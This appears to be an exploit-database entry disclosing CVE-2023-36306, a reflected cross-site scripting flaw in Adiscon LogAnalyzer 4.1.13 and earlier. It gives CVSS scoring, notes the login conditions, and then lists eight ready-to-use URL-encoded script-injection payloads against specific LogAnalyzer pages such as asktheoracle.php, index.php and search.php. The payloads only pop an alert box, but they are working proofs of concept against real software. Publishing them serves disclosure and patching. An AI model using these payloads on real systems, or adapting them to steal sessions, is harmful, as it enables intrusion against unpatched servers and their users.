Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting

2023-08-0400:00:00

Pedro

www.exploit-db.com

184

adiscon loganalyzer

cross site scripting

vulnerability

linux

cve-2023-36306

xss payloads

security issue

web application

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.009

Percentile

82.7%

JSON

# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
# Date: 2023.Aug.01
# Exploit Author: Pedro (ISSDU TW)
# Vendor Homepage: https://loganalyzer.adiscon.com/
# Software Link: https://loganalyzer.adiscon.com/download/
# Version: v4.1.13 and before
# Tested on: Linux
# CVE : CVE-2023-36306

There are several installation method.
If you installed without database(File-Based),No need to login.
If you installed with database, You should login with Read Only User(at least)

XSS Payloads are as below:

XSS
http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123
http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E